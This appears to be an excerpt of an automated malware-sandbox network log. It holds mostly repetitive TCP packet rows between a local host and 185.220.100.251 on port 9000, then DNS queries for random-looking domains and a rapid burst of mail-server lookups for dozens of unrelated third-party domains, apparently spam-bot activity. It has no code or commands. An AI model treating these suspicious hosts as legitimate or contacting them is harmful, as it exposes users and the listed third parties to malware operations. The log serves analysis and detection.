                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:20.607827902 CET900049775185.220.100.251192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:20.607835054 CET497759000192.168.2.6185.220.100.251
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:20.607841969 CET900049775185.220.100.251192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:20.607851982 CET900049775185.220.100.251192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:20.607861996 CET497759000192.168.2.6185.220.100.251
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:20.607862949 CET900049775185.220.100.251192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:20.607876062 CET900049775185.220.100.251192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:20.607884884 CET497759000192.168.2.6185.220.100.251
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:20.607887030 CET900049775185.220.100.251192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:20.607897997 CET900049775185.220.100.251192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:20.607903004 CET497759000192.168.2.6185.220.100.251
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:20.607908964 CET900049775185.220.100.251192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:20.607920885 CET900049775185.220.100.251192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:20.607930899 CET497759000192.168.2.6185.220.100.251
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:20.607933044 CET900049775185.220.100.251192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:20.607944012 CET900049775185.220.100.251192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:20.607954979 CET900049775185.220.100.251192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:20.607971907 CET497759000192.168.2.6185.220.100.251
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:20.607971907 CET497759000192.168.2.6185.220.100.251
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:20.607988119 CET900049775185.220.100.251192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:20.607995033 CET497759000192.168.2.6185.220.100.251
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:20.607999086 CET900049775185.220.100.251192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:20.608011007 CET900049775185.220.100.251192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:20.608021975 CET900049775185.220.100.251192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:20.608023882 CET497759000192.168.2.6185.220.100.251
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:20.608033895 CET900049775185.220.100.251192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:20.608043909 CET900049775185.220.100.251192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:20.608057976 CET497759000192.168.2.6185.220.100.251
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:20.608058929 CET900049775185.220.100.251192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:20.608078957 CET497759000192.168.2.6185.220.100.251
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:20.608098984 CET497759000192.168.2.6185.220.100.251
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:20.611314058 CET900049775185.220.100.251192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:20.611377001 CET497759000192.168.2.6185.220.100.251
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:20.616832972 CET900049775185.220.100.251192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:20.616878033 CET900049775185.220.100.251192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:20.616899967 CET497759000192.168.2.6185.220.100.251
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:20.616925001 CET497759000192.168.2.6185.220.100.251
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:20.616949081 CET900049775185.220.100.251192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:20.616986990 CET497759000192.168.2.6185.220.100.251
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:20.617121935 CET900049775185.220.100.251192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:20.617132902 CET900049775185.220.100.251192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:20.617165089 CET497759000192.168.2.6185.220.100.251
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:20.617202044 CET900049775185.220.100.251192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:20.617213964 CET900049775185.220.100.251192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:20.617254019 CET497759000192.168.2.6185.220.100.251
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:20.617270947 CET497759000192.168.2.6185.220.100.251
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:20.617296934 CET900049775185.220.100.251192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:20.617311001 CET900049775185.220.100.251192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:20.617340088 CET497759000192.168.2.6185.220.100.251
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:20.617352009 CET497759000192.168.2.6185.220.100.251
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:20.617412090 CET900049775185.220.100.251192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:20.617424011 CET900049775185.220.100.251192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:20.617435932 CET900049775185.220.100.251192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:20.617445946 CET900049775185.220.100.251192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:20.617453098 CET497759000192.168.2.6185.220.100.251
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:20.617456913 CET900049775185.220.100.251192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:20.617466927 CET497759000192.168.2.6185.220.100.251
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:20.617469072 CET900049775185.220.100.251192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:20.617480040 CET900049775185.220.100.251192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:20.617491007 CET900049775185.220.100.251192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:20.617496967 CET497759000192.168.2.6185.220.100.251
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:20.617520094 CET497759000192.168.2.6185.220.100.251
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:20.617539883 CET497759000192.168.2.6185.220.100.251
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:20.617863894 CET900049775185.220.100.251192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:20.617903948 CET497759000192.168.2.6185.220.100.251
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:20.617924929 CET900049775185.220.100.251192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:20.617935896 CET900049775185.220.100.251192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:20.617959023 CET497759000192.168.2.6185.220.100.251
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:20.617976904 CET497759000192.168.2.6185.220.100.251
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:20.618069887 CET900049775185.220.100.251192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:20.618083000 CET900049775185.220.100.251192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:20.618105888 CET497759000192.168.2.6185.220.100.251
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:20.618105888 CET900049775185.220.100.251192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:20.618119001 CET900049775185.220.100.251192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:20.618123055 CET497759000192.168.2.6185.220.100.251
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:20.618143082 CET497759000192.168.2.6185.220.100.251
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:20.618151903 CET900049775185.220.100.251192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:20.618155003 CET497759000192.168.2.6185.220.100.251
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:20.618165016 CET900049775185.220.100.251192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:20.618175983 CET900049775185.220.100.251192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:20.618187904 CET497759000192.168.2.6185.220.100.251
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:20.618206024 CET497759000192.168.2.6185.220.100.251
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:20.618222952 CET497759000192.168.2.6185.220.100.251
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:20.618236065 CET900049775185.220.100.251192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:20.618247986 CET900049775185.220.100.251192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:20.618259907 CET900049775185.220.100.251192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:20.618272066 CET900049775185.220.100.251192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:20.618280888 CET900049775185.220.100.251192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:20.618288040 CET900049775185.220.100.251192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:20.618299961 CET497759000192.168.2.6185.220.100.251
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:20.618309975 CET900049775185.220.100.251192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:20.618318081 CET497759000192.168.2.6185.220.100.251
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:20.618320942 CET900049775185.220.100.251192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:20.618335962 CET900049775185.220.100.251192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:20.618346930 CET900049775185.220.100.251192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:20.618352890 CET497759000192.168.2.6185.220.100.251
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:20.618372917 CET497759000192.168.2.6185.220.100.251
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:20.618396044 CET497759000192.168.2.6185.220.100.251
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:20.618417978 CET900049775185.220.100.251192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:20.618429899 CET900049775185.220.100.251192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:20.618458033 CET497759000192.168.2.6185.220.100.251
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:20.618474960 CET497759000192.168.2.6185.220.100.251
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:20.618484020 CET900049775185.220.100.251192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:20.618524075 CET497759000192.168.2.6185.220.100.251
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:20.618527889 CET900049775185.220.100.251192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:20.619301081 CET900049775185.220.100.251192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:20.619313955 CET900049775185.220.100.251192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:20.619358063 CET497759000192.168.2.6185.220.100.251
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:20.619373083 CET900049775185.220.100.251192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:20.619374037 CET497759000192.168.2.6185.220.100.251
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:20.619385958 CET900049775185.220.100.251192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:20.619396925 CET900049775185.220.100.251192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:20.619410038 CET900049775185.220.100.251192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:20.619411945 CET497759000192.168.2.6185.220.100.251
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:20.619421959 CET900049775185.220.100.251192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:20.619430065 CET497759000192.168.2.6185.220.100.251
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:20.619458914 CET497759000192.168.2.6185.220.100.251
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:20.619499922 CET900049775185.220.100.251192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:20.619517088 CET900049775185.220.100.251192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:20.619540930 CET497759000192.168.2.6185.220.100.251
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:20.619556904 CET900049775185.220.100.251192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:20.619564056 CET497759000192.168.2.6185.220.100.251
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:20.619591951 CET497759000192.168.2.6185.220.100.251
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:20.619616985 CET900049775185.220.100.251192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:20.619630098 CET900049775185.220.100.251192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:20.619641066 CET900049775185.220.100.251192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:20.619652987 CET900049775185.220.100.251192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:20.619656086 CET497759000192.168.2.6185.220.100.251
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:20.619666100 CET900049775185.220.100.251192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:20.619673967 CET497759000192.168.2.6185.220.100.251
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:20.619678020 CET900049775185.220.100.251192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:20.619688988 CET900049775185.220.100.251192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:20.619702101 CET497759000192.168.2.6185.220.100.251
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:20.619719982 CET497759000192.168.2.6185.220.100.251
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:20.619739056 CET900049775185.220.100.251192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:20.619751930 CET900049775185.220.100.251192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:20.619772911 CET497759000192.168.2.6185.220.100.251
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:20.619798899 CET497759000192.168.2.6185.220.100.251
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:20.620075941 CET900049775185.220.100.251192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:20.620089054 CET900049775185.220.100.251192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:20.620100021 CET900049775185.220.100.251192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:20.620115995 CET497759000192.168.2.6185.220.100.251
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:20.620136976 CET497759000192.168.2.6185.220.100.251
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:20.620161057 CET900049775185.220.100.251192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:20.620174885 CET900049775185.220.100.251192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:20.620186090 CET900049775185.220.100.251192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:20.620198011 CET497759000192.168.2.6185.220.100.251
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:20.620198011 CET900049775185.220.100.251192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:20.620209932 CET900049775185.220.100.251192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:20.620230913 CET497759000192.168.2.6185.220.100.251
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:20.620251894 CET497759000192.168.2.6185.220.100.251
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:20.620258093 CET900049775185.220.100.251192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:20.620270014 CET900049775185.220.100.251192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:20.620280981 CET900049775185.220.100.251192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:20.620292902 CET900049775185.220.100.251192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:20.620294094 CET497759000192.168.2.6185.220.100.251
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:20.620312929 CET497759000192.168.2.6185.220.100.251
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:20.620331049 CET900049775185.220.100.251192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:20.620338917 CET497759000192.168.2.6185.220.100.251
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:20.620345116 CET900049775185.220.100.251192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:20.620382071 CET497759000192.168.2.6185.220.100.251
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:20.620402098 CET900049775185.220.100.251192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:20.620414972 CET900049775185.220.100.251192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:20.620430946 CET497759000192.168.2.6185.220.100.251
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:20.620444059 CET497759000192.168.2.6185.220.100.251
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:20.620452881 CET497759000192.168.2.6185.220.100.251
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:20.620464087 CET900049775185.220.100.251192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:20.620479107 CET900049775185.220.100.251192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:20.620488882 CET900049775185.220.100.251192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:20.620502949 CET497759000192.168.2.6185.220.100.251
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:20.620523930 CET497759000192.168.2.6185.220.100.251
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:20.620548010 CET900049775185.220.100.251192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:20.620559931 CET900049775185.220.100.251192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:20.620569944 CET900049775185.220.100.251192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:20.620582104 CET900049775185.220.100.251192.168.2.6
                                                                                                                                                                                                                                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:34.192706108 CET192.168.2.61.1.1.10xa258Standard query (0)onualituyrs.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:34.332216024 CET192.168.2.61.1.1.10x601fStandard query (0)sumagulituyo.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:35.081417084 CET192.168.2.61.1.1.10xf52aStandard query (0)snukerukeutit.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:35.668489933 CET192.168.2.61.1.1.10x27d5Standard query (0)lightseinsteniki.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:37.686333895 CET192.168.2.61.1.1.10xd636Standard query (0)liuliuoumumy.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:40.372597933 CET192.168.2.61.1.1.10xf84fStandard query (0)stualialuyastrelia.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:48.170262098 CET192.168.2.61.1.1.10x9f65Standard query (0)atozrental.ccA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:49.200009108 CET192.168.2.61.1.1.10x9f65Standard query (0)atozrental.ccA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:50.215226889 CET192.168.2.61.1.1.10x9f65Standard query (0)atozrental.ccA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:26.587095022 CET192.168.2.61.1.1.10x4700Standard query (0)humydrole.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:27.591542006 CET192.168.2.61.1.1.10x4700Standard query (0)humydrole.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:28.606528997 CET192.168.2.61.1.1.10x4700Standard query (0)humydrole.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:23.613282919 CET192.168.2.61.1.1.10xf562Standard query (0)elohin.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:23.614491940 CET192.168.2.61.1.1.10xebc6Standard query (0)elseti.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:23.615122080 CET192.168.2.61.1.1.10x7a35Standard query (0)evropskypravnik.czMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:23.615200996 CET192.168.2.61.1.1.10x6f07Standard query (0)egmaik.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:23.615613937 CET192.168.2.61.1.1.10xb85fStandard query (0)conceptualintegration.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:23.615652084 CET192.168.2.61.1.1.10xd4deStandard query (0)evstratov.deMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:23.616287947 CET192.168.2.61.1.1.10x9fafStandard query (0)bokod.huMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:23.616358995 CET192.168.2.61.1.1.10xa061Standard query (0)aopcgaming.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:23.616689920 CET192.168.2.61.1.1.10xf953Standard query (0)elyashevich.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:23.616749048 CET192.168.2.61.1.1.10x6981Standard query (0)kidj.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:23.617172956 CET192.168.2.61.1.1.10x84ebStandard query (0)mail.tomsknetruMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:23.617352009 CET192.168.2.61.1.1.10x24e6Standard query (0)eremina.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:23.617551088 CET192.168.2.61.1.1.10x93aaStandard query (0)erofeev.infoMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:23.617770910 CET192.168.2.61.1.1.10x9935Standard query (0)ershov.orgMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:23.618032932 CET192.168.2.61.1.1.10x7d04Standard query (0)my-bingo-games.infoMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:23.618151903 CET192.168.2.61.1.1.10x6066Standard query (0)dune-architecture.beMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:23.618451118 CET192.168.2.61.1.1.10x590bStandard query (0)esn.spb.ruMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:23.618486881 CET192.168.2.61.1.1.10xc8c4Standard query (0)estbest.eeMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:23.618737936 CET192.168.2.61.1.1.10x106cStandard query (0)topbingo-games.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:23.619173050 CET192.168.2.61.1.1.10x7c41Standard query (0)euromarin.esMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:23.620570898 CET192.168.2.61.1.1.10x9389Standard query (0)ext.byMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:23.622494936 CET192.168.2.61.1.1.10x37d9Standard query (0)blagotvoritel.orgMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:23.643145084 CET192.168.2.61.1.1.10x5708Standard query (0)pfprojekt.skMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:23.649085045 CET192.168.2.61.1.1.10x162bStandard query (0)frametalent.itMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:23.649127960 CET192.168.2.61.1.1.10x11e4Standard query (0)bdoxwz.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:23.654151917 CET192.168.2.61.1.1.10x1e0cStandard query (0)winstonlf.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:23.654556036 CET192.168.2.61.1.1.10x1a46Standard query (0)noxnoir.dkMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:23.655246973 CET192.168.2.61.1.1.10xc26aStandard query (0)bingo.cozaMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:23.665921926 CET192.168.2.61.1.1.10x57eeStandard query (0)moraci.itMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:23.665994883 CET192.168.2.61.1.1.10x378aStandard query (0)neugear.caMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:23.666322947 CET192.168.2.61.1.1.10xf23eStandard query (0)la-morada.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:23.666593075 CET192.168.2.61.1.1.10x7702Standard query (0)malibusands.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:23.666609049 CET192.168.2.61.1.1.10x428bStandard query (0)brevesdunsoir.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:23.669166088 CET192.168.2.61.1.1.10x5675Standard query (0)assiri.tkMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:23.669701099 CET192.168.2.61.1.1.10x6ad7Standard query (0)datasense.frMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:23.671109915 CET192.168.2.61.1.1.10x2c23Standard query (0)rabco.beMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:23.672786951 CET192.168.2.61.1.1.10x54e0Standard query (0)fedyanin.wsMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:23.672894001 CET192.168.2.61.1.1.10x6941Standard query (0)yoymail.itMX (Mail exchange)IN (0x0001)false
